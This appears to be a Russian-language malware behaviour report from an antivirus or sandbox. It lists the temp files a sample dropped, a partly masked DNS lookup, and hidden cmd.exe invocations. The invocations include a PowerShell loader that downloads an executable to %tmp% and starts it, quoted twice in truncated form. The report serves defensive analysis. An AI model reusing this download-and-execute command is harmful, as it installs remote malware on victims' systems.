Техническая информация
- $s1 как %temp%\tmp6032.exe
- '<SYSTEM32>\cmd.exe' /c powershell "'powershell ""<#close task#>function monik([string] $s1){(new-object system.net.webclient).downloadfile($s1,''%tmp%\tmp6032.exe'');<#asc info#>start-process ''%tmp%\tmp6032.exe''...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1488
- %TEMP%\1098309.cvr
- %TEMP%\tmp7308.bat
- DNS ASK ba###secure.com
- '<SYSTEM32>\cmd.exe' /c powershell "'powershell ""<#close task#>function monik([string] $s1){(new-object system.net.webclient).downloadfile($s1,''%tmp%\tmp6032.exe'');<#asc info#>start-process ''%tmp%\tmp6032.exe''...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\tmp7308.bat" "' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\tmp7308.bat" "